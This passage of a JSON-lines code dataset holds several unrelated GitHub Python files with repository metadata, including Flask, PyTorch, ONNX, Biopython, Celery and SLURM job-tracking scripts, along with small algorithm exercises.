render_template('chinese.html',name=name)\n\n\n@app.route('/report')\ndef report(): \n username = request.args.get('username')\n email = request.args.get('email')\n\n lower_letter = False\n upper_letter = False\n num_end = False\n validatedemail = False\n\n if (username and email):\n lower_letter = any(letter.islower() for letter in username)\n upper_letter = any(letter.isupper() for letter in username)\n num_end = username[-1].isdigit()\n validatedemail = 
validate_email(email)\n\n report = lower_letter and upper_letter and num_end and validatedemail\n \n if report:\n # if user info is validated, pass it to DB\n new_user = User(username, email)\n db.session.add(new_user)\n db.session.commit()\n\n return render_template('report.html',\n username=username,report=report,\n lower_letter=lower_letter,\n upper_letter=upper_letter,\n num_end=num_end,\n validatedemail = validatedemail)\n else:\n return redirect(url_for('index'))\n\n@app.route('/user/<name>')\ndef user(name):\n return '<h1>This is a page for {}<h1>'.format(name.upper())\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'),404\n\nclass AllTea(Resource):\n\n def get(self):\n tea = Tea.query.all()\n\n if tea:\n # return json of teas\n return [t.json() for t in tea]\n else:\n return {'tea_choice':'not found'}, 404\n\n\nclass AllUsers(Resource):\n\n def get(self):\n users = User.query.all()\n\n if users:\n # return json of users\n return [user.json() for user in users]\n else:\n return {'username':'not found'}, 404\n\napi.add_resource(AllTea,'/teas')\napi.add_resource(AllUsers,'/users')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"AbbyBiying/Tea-Time","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":8427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"71100509447","text":"import random\n\ndef binary_search(L, t, low, high):\n while low <= high:\n mid = (low + high) // 2\n if L[mid] == t:\n return True\n elif L[mid] < t:\n low = mid + 1\n else:\n high = mid - 1\n return False\n\n\nif __name__ == \"__main__\":\n L = [random.randint(0,30) for _ in range(20)]\n L.sort()\n\n print(L)\n print(binary_search(L, 14, 0, len(L)-1))","repo_name":"douzujun/Python-Foundation-Suda","sub_path":"上机题目和面试题整理/Python-Foundation-Suda-master/02_MOOC习题/04_2二分查找.py","file_name":"04_2二分查找.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":51,"dataset":"github-code","pt":"16"} +{"seq_id":"36467695351","text":"# -*- coding:utf-8 -*-\nfrom celery import Celery\n\n\napp = Celery('tasks')\n\napp.config_from_object(\"celeryconfig\")\n\n\n\n@app.task\ndef add(x, y):\n return x + y\n\n@app.task\ndef error_handler(uuid):\n result = AsyncResult(uuid)\n exc = result.get(propagate=False)\n print('Task {0} raised exception: {1!r}\\n{2!r}'.format(\n uuid, exc, result.traceback))","repo_name":"ShichaoMa/old-spider","sub_path":"test/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"25013360527","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 8 21:30:29 2019\r\n\r\n@author: Vincent\r\n\"\"\"\r\n\r\nfrom __future__ import print_function\r\nimport torch\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom scipy.stats import zscore\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom sklearn.model_selection import train_test_split\r\nfrom torch.utils.data import DataLoader\r\nimport cv2 as cv\r\nimport matplotlib.pyplot as plt\r\nfrom torchvision.models import vgg\r\n\r\n#either uses GPU or CPU, depending if cuda is available\r\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\n\r\n#the neural networks we are testing\r\nclass Net1(nn.Module):\r\n \r\n def __init__(self, num_classes=10):\r\n super(Net1, self).__init__()\r\n self.layer1 = 
nn.Sequential(\r\n nn.Conv2d(1, 16, kernel_size=4, stride=1, padding=2),\r\n nn.BatchNorm2d(200),\r\n nn.ReLU(),\r\n nn.MaxPool2d(kernel_size=2, stride=2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(16, 32, kernel_size=4, stride=1, padding=2),\r\n nn.BatchNorm2d(50),\r\n nn.ReLU(),\r\n nn.MaxPool2d(kernel_size=2, stride=2))\r\n self.fc = nn.Linear(50*17*17, num_classes)\r\n \r\n def forward(self, x):\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = out.reshape(-1, 50*17*17)\r\n out = self.fc(out)\r\n return out\r\n\r\nclass Net2(nn.Module):\r\n def __init__(self, num_classes=10):\r\n super(Net2, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer3 = nn.Sequential(\r\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer4 = nn.Sequential(\r\n nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer5 = nn.Sequential(\r\n nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4, padding=1, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.fc = nn.Linear(256, num_classes)\r\n \r\n def forward(self, x):\r\n in_size=x.size(0)\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = self.layer3(out)\r\n #print(out.shape)\r\n out = self.layer4(out)\r\n #print(out.shape)\r\n out = self.layer5(out)\r\n #print(out.shape)\r\n out = out.view(in_size, -1)\r\n out = self.fc(out)\r\n return out\r\n\r\nclass Net3(nn.Module):\r\n def __init__(self, num_classes=10):\r\n super(Net3, self).__init__()\r\n self.layer1 = nn.Sequential(\r\n nn.Conv2d(in_channels=1, out_channels=16, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer2 = nn.Sequential(\r\n nn.Conv2d(in_channels=16, out_channels=32, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer3 = nn.Sequential(\r\n nn.Conv2d(in_channels=32, out_channels=64, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2))\r\n self.layer4 = nn.Sequential(\r\n nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer5 = nn.Sequential(\r\n nn.Conv2d(in_channels=128, out_channels=256, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.layer6 = nn.Sequential(\r\n nn.Conv2d(in_channels=256, out_channels=128, kernel_size=4, padding=2, stride=1),\r\n nn.Dropout(p=0.5),\r\n nn.ReLU(),\r\n nn.MaxPool2d(2,2)) \r\n self.fc1 = nn.Linear(128, 128)\r\n self.fc2 = nn.Linear(128, num_classes)\r\n \r\n def forward(self, x):\r\n in_size=x.size(0)\r\n out = self.layer1(x)\r\n #print(out.shape)\r\n out = self.layer2(out)\r\n #print(out.shape)\r\n out = self.layer3(out)\r\n #print(out.shape)\r\n out = self.layer4(out)\r\n #print(out.shape)\r\n out = self.layer5(out)\r\n #print(out.shape)\r\n out = 
self.layer6(out)\r\n #print(out.shape)\r\n out = out.view(in_size, -1)\r\n out = self.fc1(out)\r\n out = self.fc2(out)\r\n return out\r\n \r\n#A custom dataset for our images and labels\r\nclass CustomDataset(torch.utils.data.Dataset):\r\n def __init__(self, X_tensor, y_tensor):\r\n self.X_tensor = X_tensor\r\n self.y_tensor = y_tensor\r\n return\r\n def __getitem__(self, index):\r\n self.img = self.X_tensor[index]\r\n label = self.y_tensor[index]\r\n return (self.img,label)\r\n def __len__(self):\r\n return self.X_tensor.size()[0]\r\n\r\n#function that preproceses our images\r\ndef preprocess(images):\r\n \r\n images = images/255\r\n images[images < 0.90] = 0\r\n images[images > 0] = 1\r\n \r\n for i in range(len(images)):\r\n \r\n image = images[i] \r\n image=np.array(image, dtype='uint8') \r\n \r\n contours,_ = cv.findContours(image, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\r\n \r\n largest_area = 0\r\n for contour in contours:\r\n \r\n coor1, coor2, width, height = cv.boundingRect(contour)\r\n \r\n side = max(width, height)\r\n \r\n area = side * side\r\n \r\n if area > largest_area:\r\n largest_area = area\r\n larC1, larC2, larW, larH = coor1, coor2, width, height\r\n \r\n \r\n largest_digit = image[larC2:larC2+larH,larC1:larC1+larW]\r\n \r\n [rows,cols] = largest_digit.shape\r\n if rows>cols:\r\n difference = rows - cols\r\n if difference%2 !=0:\r\n difference += 1 \r\n image = np.concatenate((np.zeros((rows,int(difference/2))),largest_digit,np.zeros((rows,int(difference/2)))), axis=1)\r\n elif rows<cols:\r\n difference = cols - rows\r\n if difference%2 !=0:\r\n difference += 1 \r\n image = np.concatenate((np.zeros((int(difference/2),cols)),largest_digit,np.zeros((int(difference/2),cols))), axis=0)\r\n else:\r\n image = largest_digit\r\n \r\n image = cv.resize(image,(64, 64), interpolation = cv.INTER_AREA)\r\n images[i] = image\r\n \r\n return images\r\n\r\n#builds the dataloaders for our images and labels\r\ndef build_loaders():\r\n \r\n train_images = pd.read_pickle('train_images.pkl')\r\n train_labels = pd.read_csv('train_labels.csv')\r\n\r\n '''\r\n img_idx = 3\r\n plt.title('Label: {}'.format(train_labels.iloc[img_idx]['Category']))\r\n plt.imshow(train_images[img_idx])\r\n '''\r\n\r\n train_images = preprocess(train_images)\r\n \r\n '''\r\n img_idx = 17\r\n plt.title('Label: {}'.format(train_labels.iloc[img_idx]['Category']))\r\n plt.imshow(train_images[img_idx]) \r\n '''\r\n \r\n train_images = train_images.reshape((40000,1,64,64))\r\n \r\n #Pre-Process the csv-files of the labels \r\n train_labels = train_labels.drop(['Id'], axis=1)\r\n train_labels = train_labels.values\r\n train_labels = np.reshape(train_labels, (-1))\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(train_images, train_labels, test_size=0.10, random_state=2)\r\n #X_test, X_rem, y_test, y_rem = train_test_split(X_test, y_test, test_size=0.90, random_state=2)\r\n \r\n X_tensor_train = torch.tensor(X_train)\r\n y_tensor_train = torch.tensor(y_train)\r\n X_tensor_test = torch.tensor(X_test)\r\n y_tensor_test = torch.tensor(y_test)\r\n\r\n train_dataset = CustomDataset(X_tensor_train, y_tensor_train)\r\n test_dataset = CustomDataset(X_tensor_test, y_tensor_test)\r\n\r\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,batch_size=2, shuffle=True)\r\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset,batch_size=2, shuffle=True)\r\n \r\n return train_loader, test_loader, X_tensor_test, y_tensor_test\r\n\r\n#function that predicts the label for every image in the test set. 
Returns a\r\n#panda dataframe\r\ndef predictTest():\r\n \r\n test_images = pd.read_pickle('test_images.pkl')\r\n \r\n img_idx = 4\r\n plt.imshow(test_images[img_idx])\r\n \r\n test_images = preprocess(test_images)\r\n test_images = test_images.reshape(10000,1,64,64)\r\n test_images = torch.tensor(test_images)\r\n \r\n predicted = np.zeros((len(test_images)))\r\n for i in range(len(test_images)):\r\n image = test_images[i,:,:,:]\r\n image = image.reshape(1,1,64,64)\r\n output = net(image)\r\n _, predicted[i] = torch.max(output.data, 1)\r\n \r\n predicted = predicted.astype(int)\r\n dataframe = pd.DataFrame({'Category':predicted})\r\n dataframe.to_csv(\"submission.csv\")\r\n \r\n return predicted\r\n \r\n#loop that runs the adam algorithm\r\ndef makeItLearn(epoch, best_model_accuracy):\r\n \r\n optimizer = torch.optim.Adam(net.parameters(), lr=learning_rate, weight_decay = 0)\r\n \r\n #for each batch, update the weights, using the Adam Algorithm \r\n total_step = len(train_loader)\r\n for i, (images, labels) in enumerate(train_loader):\r\n \r\n images = images.to(device)\r\n labels = labels.to(device)\r\n optimizer.zero_grad() # zero the gradient buffers\r\n output = net(images)\r\n loss = cross_entropy(output, labels)\r\n loss.backward()\r\n optimizer.step()\r\n \r\n #prints the loss\r\n if (i+1) % 10 == 0:\r\n print ('Epoch [{}/{}], Step [{}/{}], Loss: {:.4f}' \r\n .format(epoch+1, num_epochs, i+1, total_step, loss.item()))\r\n\r\n #compute the accuracy of our model on the validation set\r\n class_correct = list(0. for i in range(10))\r\n class_total = list(0. for i in range(10)) \r\n with torch.no_grad():\r\n correct = 0\r\n total = 0\r\n for images, labels in test_loader:\r\n images = images.to(device)\r\n labels = labels.to(device)\r\n outputs = net(images)\r\n _, predicted = torch.max(outputs.data, 1)\r\n c = (predicted == labels).squeeze()\r\n \r\n total += labels.size(0)\r\n correct += (predicted == labels).sum().item()\r\n \r\n for i in range(2):\r\n label = labels[i]\r\n class_correct[label] += c[i].item()\r\n class_total[label] += 1\r\n \r\n \r\n accuracy = 100 * correct / total\r\n print('Test Accuracy of the model on the test images: {} %'.format(accuracy))\r\n \r\n #if the accuracy obtained with these new weights is better than whatever\r\n #we had as our best model before, we save the best_model in a .ckpt file\r\n if(accuracy) > best_model_accuracy:\r\n \r\n print(\"DAMN!!! 
Good Job <3!!!\")\r\n torch.save(net.state_dict(), 'best_model.ckpt')\r\n best_model_accuracy = accuracy\r\n \r\n #gives the accuracy of our model on each of the labels, separately\r\n for i in range(10):\r\n print('Accuracy of %d : %2d %%' % (\r\n i, 100 * class_correct[i] / class_total[i]))\r\n \r\n loss_accuracy_lr[epoch, 0] = loss.item() #loss on training set\r\n loss_accuracy_lr[epoch, 1] = (100 * correct / total) #accuracy on valid set\r\n loss_accuracy_lr[epoch, 2] = epoch #nb of epochs\r\n \r\n return best_model_accuracy\r\n\r\n#return the prediction on our validation set, which an array of tensors\r\n#as input (not the dataloader)\r\ndef getPredictionsValidation(test_images):\r\n predicted = np.zeros((len(test_images)))\r\n for i in range(len(test_images)):\r\n image = test_images[i,:,:,:]\r\n image = image.reshape(1,1,64,64)\r\n output = net(image)\r\n _, predicted[i] = torch.max(output.data, 1)\r\n \r\n return predicted\r\n\r\n#return a list of the wrongly labeled images in the test set (aka validation set)\r\ndef getWrongs(predicted, y_tensor_test):\r\n \r\n y_tensor_test = y_tensor_test.numpy()\r\n \r\n wrongs = []\r\n for i in range(len(predicted)):\r\n if predicted[i] != y_tensor_test[i]:\r\n wrongs.append(i)\r\n \r\n return wrongs\r\n\r\n#function that pre process the images for them to be used on the VGG model\r\ndef VGG_get_loaders():\r\n \r\n train_images = pd.read_pickle('train_images.pkl')\r\n train_labels = pd.read_csv('train_labels.csv')\r\n\r\n train_images = preprocess(train_images)\r\n train_images = train_images.reshape((40000,1,64,64))\r\n train_images_3 = np.zeros((40000,3,64,64))\r\n \r\n train_images_3[:,0,:,:] = train_images\r\n train_images_3[:,1,:,:] = train_images\r\n train_images_3[:,2,:,:] = train_images\r\n train_images = train_images_3\r\n \r\n #Pre-Process the csv-files of the labels \r\n train_labels = train_labels.drop(['Id'], axis=1)\r\n train_labels = train_labels.values\r\n train_labels = np.reshape(train_labels, (-1))\r\n\r\n X_train, X_test, y_train, y_test = train_test_split(train_images, train_labels, test_size=0.10, random_state=2)\r\n #X_test, X_rem, y_test, y_rem = train_test_split(X_test, y_test, test_size=0.90, random_state=2)\r\n \r\n X_tensor_train = torch.tensor(X_train) \r\n y_tensor_train = torch.tensor(y_train)\r\n X_tensor_test = torch.tensor(X_test)\r\n y_tensor_test = torch.tensor(y_test)\r\n\r\n train_dataset = CustomDataset(X_tensor_train, y_tensor_train)\r\n test_dataset = CustomDataset(X_tensor_test, y_tensor_test)\r\n\r\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,batch_size=2, shuffle=True)\r\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset,batch_size=2, shuffle=True)\r\n \r\n return train_loader, test_loader, X_tensor_test, y_tensor_test\r\n \r\n'''\r\nMAIN\r\n'''\r\ncross_entropy = nn.CrossEntropyLoss()\r\n\r\n#LOAD MODEL\r\nnet = Net2()\r\n#net = Net3()\r\n#net = vgg.vgg16(pretrained=True)\r\n\r\n#SAVES CURRENT BEST ACCURACY + LOAD BEST MODEL\r\n#best_model_accuracy = 0\r\n#net.load_state_dict(torch.load('90_5.ckpt'))\r\n\r\n#GET INDICES OF WRONGLY PREDICTED IMAGES IN VALIDATION SET\r\n#_,_, X_tensor_test, y_tensor_test = build_loaders()\r\n#predicted = getPredictionsValidation(X_tensor_test)\r\n#wrongs = getWrongs(predicted, y_tensor_test)\r\n\r\n#GET PREDICTED LABELS FOR THE TEST SET\r\n#predicted = predictTest() \r\n\r\n#TRAIN THE MODEL\r\n\r\n#load the datasets into a loader\r\ntrain_loader, test_loader,_,_ = build_loaders() \r\n\r\nnum_epochs = 20\r\nlearning_rate = 
0.0007\r\nloss_accuracy_lr = np.zeros((20,3)) \r\n#we compare the accuracy of our newly trained model to our previous best model\r\nfor epoch in range(num_epochs):\r\n best_model_accuracy = makeItLearn(epoch, best_model_accuracy)\r\n","repo_name":"VinceBaz/COMP551_3","sub_path":"ourCode.py","file_name":"ourCode.py","file_ext":"py","file_size_in_byte":15627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42436113834","text":"import torch.nn.functional as F\nfrom data.images import CIFAR10_NAME, TINY_IMAGENET_NAME\nfrom torch import Tensor, nn\n\nfrom models.basenet import BaseNet\n\n\nclass VanillaCNN(BaseNet):\n def __init__(self, net_id: int, class_id: int, dataset_name: str) -> None:\n super(VanillaCNN, self).__init__(net_id, class_id)\n\n assert dataset_name in [TINY_IMAGENET_NAME, CIFAR10_NAME]\n\n if dataset_name == TINY_IMAGENET_NAME:\n config = [[8, 3, 2], [16, 3, 2], [32, 3, 2], [64, 3, 2], [64, 3, 2]]\n input_size = 64\n in_ch = 3\n num_classes = 200\n else:\n config = [[8, 3, 2], [8, 3, 1], [32, 3, 2], [64, 3, 1], [64, 3, 2]]\n input_size = 32\n in_ch = 3\n num_classes = 10\n\n tot_stride = 1\n self.layers = nn.ModuleList()\n for conf in config:\n out_ch, ks, stride = conf\n self.layers.append(nn.Conv2d(in_ch, out_ch, ks, stride=stride, padding=1))\n in_ch = out_ch\n tot_stride *= stride\n\n final_size = input_size // tot_stride\n out_ch = config[-1][0]\n self.layers.append(nn.Linear(final_size * final_size * out_ch, num_classes))\n\n def forward(self, x: Tensor) -> Tensor:\n for layer in self.layers[:-1]:\n x = F.leaky_relu(layer(x))\n x = x.view(x.size()[0], -1)\n x = self.layers[-1](x)\n\n return x\n\n def func_forward(self, x: Tensor, prep: Tensor) -> Tensor:\n params = self.params_from_prep(prep)\n\n for i in range(len(self.layers[:-1])):\n stride = self.layers[i].stride\n idx = i * 2\n x = F.conv2d(x, params[idx], bias=params[idx + 1], stride=stride, padding=1)\n x = F.leaky_relu(x)\n\n x = x.view(x.size()[0], -1)\n x = F.linear(x, params[-2], bias=params[-1])\n\n return x\n","repo_name":"CVLAB-Unibo/netspace","sub_path":"models/vanillacnn.py","file_name":"vanillacnn.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"34074162847","text":"from collections import deque\n\ndef solution(circle: deque, K: int):\n counter = 0\n while circle:\n counter += 1\n if counter % K == 0:\n print(circle.popleft(), end='')\n if circle:\n print(', ', end='')\n else:\n circle.append(circle.popleft())\n\nN, K = map(int, input().split())\ncircle = deque([i for i in range(1, N + 1)])\nprint('<', end='')\nsolution(circle, K)\nprint('>')\n","repo_name":"lawnmowing-programmer/algo","sub_path":"홍석민/week3/2023.03.13/boj11866/11866.py","file_name":"11866.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"72856865607","text":"import onnxruntime\nimport numpy as np\nimport cv2 as cv\nimport numba\nEP_list = ['CUDAExecutionProvider', 'CPUExecutionProvider']\n\nort_session = onnxruntime.InferenceSession(\"model.onnx\", providers=EP_list)\n\n@numba.njit\ndef assemblyFrame(ort_outputs, frame):\n colors =[\n [255, 0, 0],\n [255, 255, 0],\n [64, 255, 0],\n [0, 255, 255],\n [0, 64, 255],\n [255, 0, 128],\n [128, 0, 255],\n [128, 128, 128],\n [255, 128, 0],\n [0, 128, 255],\n [255, 255, 255],\n [0, 0, 0],\n [179, 130, 122],\n [222, 222, 222]\n 
] \n\n # res = np.zeros([256,256,3], dtype=numba.uint8)\n res = [[[0,0,0] for _ in range(256)] for _ in range(256)]\n\n i_iter = len(ort_outputs[0][0])\n k_iter = len(ort_outputs[0][0,0])\n n_iter = len(ort_outputs[0][0,0][0])\n\n for k in range(k_iter):\n for n in range(n_iter):\n colorMax = [0.0, 13.0]\n for i in range(i_iter):\n val = ort_outputs[0][0,i][k][n]\n if val > colorMax[0]:\n colorMax = [val, i]\n\n color = colors[int(colorMax[1])]\n\n res[k][n] = color\n\n return np.array(res, dtype=np.uint8), frame\n\n\n\n \ndef processing(frame):\n resized_frame = cv.resize(frame, (256, 256)) \n frame = np.array([resized_frame[:, :, 0], resized_frame[:, :, 1], resized_frame[:, :, 2]], dtype=np.float32)\n ort_inputs = {ort_session.get_inputs()[0].name: np.array([frame])}\n ort_outputs = ort_session.run(None, ort_inputs)\n res = assemblyFrame(ort_outputs, resized_frame)\n return res\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Firesieht/organs","sub_path":"recognise.py","file_name":"recognise.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70189327370","text":"# Python script to take an input corresponding to either a reference\n# (R4IDs) or query sequencing run, and output a random subsample of reads.\n\n# Author: Joe Parker (@lonelyjoeparker // joe@lonelyjoeparker.com)\n\n###########################################\n# Pseudocode for selecting subsets of reads\n#\n# add sequences\n#for r in read:\n#\tadd r.index to sequence hash with value r.seq\n#\tadd random to index hash with value r.index\n#\n# order by random integers\n#new keys hash = ordered random index hash\n#\n# select first n and output\n#for i in samples:\n#\tselect new keys hash [i]\n#\toutput append sequence hash [new keys hash[i]]\n\nimport argparse, random\nfrom Bio import SeqIO, SeqRecord\nfrom Bio.Seq import Seq\n\n# set up an argparse object to parse the N parameter\nparser = argparse.ArgumentParser(description='Python script to take an input corresponding to either a reference (R4IDs) or query sequencing run, and output a random subsample of reads.')\nparser.add_argument('N_subsamples', metavar='N', type=int, nargs='+', help='N - how many reads to subsample')\nparser.add_argument('input_file',type=argparse.FileType('r'),help='filename to open')\nparser.add_argument('output_file',type=argparse.FileType('w'),help='filename to write to')\n\n# evaluate the args\nargs = parser.parse_args()\n\n# set up input and output lists\ninput_sequences = {}\noutput_sequences = list()\n\n# read input\nwith args.input_file as file:\n sequence_file_iterator = SeqIO.parse(file,'fasta')\n for record in sequence_file_iterator:\n #print(record.description)\n #print(record.seq)\n input_sequences[record.id]=record\n\n file.close()\n\n#print 'total length of seqs hash dict ' + str(len(input_sequences))\n\n# pick subsamples\nfor i in range(0,args.N_subsamples[0]):\n\trandom_key = input_sequences.keys()[random.randint(0,len(input_sequences)-1)]\n\t#print str(i) + ': random key ' + random_key\n\toutput_sequences.append(input_sequences[random_key])\n\tdel input_sequences[random_key]\n\n# write output\t\nSeqIO.write(output_sequences,args.output_file,'fasta')\n","repo_name":"lonelyjoeparker/oddjects-sandbox","sub_path":"R4IDs/manuscript-analyses/simulate_partial_R4IDs.py","file_name":"simulate_partial_R4IDs.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
+{"seq_id":"41184712479","text":"import os\n\n### === INITIALIZE === ###\n\nscript_name = os.path.realpath(__file__).split('/')[-1]\nwdir = os.path.realpath(__file__).split(script_name)[0]\nos.chdir(wdir)\n\n### === FUNCTIONS === ###\nprint_q = 'squeue --user=`whoami` --format=\"%.7A %.35j %.10u %.7C %.10M %.15l %.20R\"'\ndef store_job_info():\n os.system(print_q + ' > current_queue.tmp')\n file = open('current_queue.tmp','r')\n lines = file.readlines()\n file.close()\n job_names = []\n job_ids = []\n working_dirs = []\n for line in lines[1:]:\n job_name = line.split()[1]\n job_id = line.split()[0]\n os.system('scontrol show job {} > jobinfo.tmp'.format(job_id))\n file2 = open('jobinfo.tmp','r')\n lines2 = file2.readlines()\n file2.close()\n for line2 in lines2:\n if 'WorkDir' in line2:\n working_dir = line2.split('WorkDir=')[1].split('\\n')[0]\n job_names.append(job_name)\n job_ids.append(job_id)\n working_dirs.append(working_dir)\n os.system('rm current_queue.tmp')\n os.system('rm jobinfo.tmp') \n with open('.current_jobs.txt','w') as f:\n for job in range(len(job_ids)):\n f.write(job_ids[job])\n f.write('\\t')\n f.write(job_names[job])\n f.write('\\t')\n f.write(working_dirs[job])\n f.write('\\n')\n return job_ids\n\ndef find_completed_jobs(job_ids):\n file = open('.previous_jobs.txt','r')\n lines = file.readlines()\n file.close()\n count = 0\n for line in lines:\n if line.split()[0] not in job_ids:\n count += 1\n print('This job is no longer running since the last time you checked: \\n NAME: {} \\n JOB ID: {} \\n Working Directory: {}.'.format(line.split()[1],line.split()[0],line.split()[2]))\n if count == 0:\n print('No jobs have ended since the last time you checked!')\n\n\n### === MAIN === ###\nif '.current_jobs.txt' not in os.listdir():\n print('No previously submitted jobs are stored. Either the file was deleted or this is your first time running this script.')\n store_job_info()\n print('The current running jobs have now been stored. 
Run this script again and you should not see this message.')\n\nelse:\n os.system('mv .current_jobs.txt .previous_jobs.txt')\n job_ids = store_job_info()\n print('Jobs you are currently running:')\n print('================================================================================================================')\n os.system(print_q)\n print('================================================================================================================')\n find_completed_jobs(job_ids)\n print('================================================================================================================')\n\n","repo_name":"hklem/slurm_job_tracking","sub_path":"jobcheck.py","file_name":"jobcheck.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"16660224581","text":"from lib.mongo_connection import MongoConnection\nfrom lib.linguistic_functions import get_supported_languages\nfrom nlp.config import SERVER\nfrom polyglot.load import load_embeddings\n\n\ndef add_polyglot_default():\n \"\"\"Defining default polyglot models\"\"\"\n entities = []\n load_embeddings()\n polyglot_model = [\n {\n 'model_settings': {\n 'tag': 'I-LOC',\n 'polyglot_model': 'ner2',\n 'case_sensitive': True\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected locations',\n 'name': 'Detects locations'\n },\n {\n 'model_settings': {\n 'tag': 'I-PER',\n 'polyglot_model': 'ner2',\n 'case_sensitive': True\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected personality',\n 'name': 'Detects persons'\n },\n {\n 'model_settings': {\n 'tag': 'I-ORG',\n 'polyglot_model': 'ner2',\n },\n 'training': 'finished',\n 'available': True,\n 'type': 'default_polyglot',\n 'description': 'Trained model based on a neural network, detected organizations',\n 'name': 'Detects organizations'\n },\n # {\n # 'model_settings': {\n # 'tag': 'negative_word',\n # 'polyglot_model': 'sentiment2',\n # 'case_sensitive': False\n # },\n # 'training': 'finished',\n # 'available': True,\n # 'type': 'default_polyglot',\n # 'description': 'Trained model based on a neural network, detected negative words',\n # 'name': 'negative words'\n # },\n # {\n # 'model_settings': {\n # 'tag': 'positive_word',\n # 'polyglot_model': 'sentiment2',\n # 'case_sensitive': False\n # },\n # 'training': 'finished',\n # 'available': True,\n # 'type': 'default_polyglot',\n # 'description': 'Trained model based on a neural network, detected positive words',\n # 'name': 'positive words'\n # },\n # {'model_settings': {'tag': 'polarity_sentence', 'polyglot_model': 'sentiment2'},\n # 'status': 'train', 'available': True, 'type': 'default_polyglot',\n # 'name': 'Polyglot default detected polarity of sentence'},\n # {'model_settings': {'tag': 'polarity_text', 'polyglot_model': 'sentiment2'},\n # 'status': 'train', 'available': True, 'type': 'default_polyglot',\n # 'name': 'Polyglot default detected polarity of document'},\n ]\n\n mongo = MongoConnection()\n for language in SERVER['language']:\n # Adding Entities\n for model in polyglot_model:\n # full_name = Language.from_code(language).name\n # if full_name in tools.list_decode(\n # downloader.supported_languages(model['model_settings']['polyglot_model'])\n # ):\n if language in 
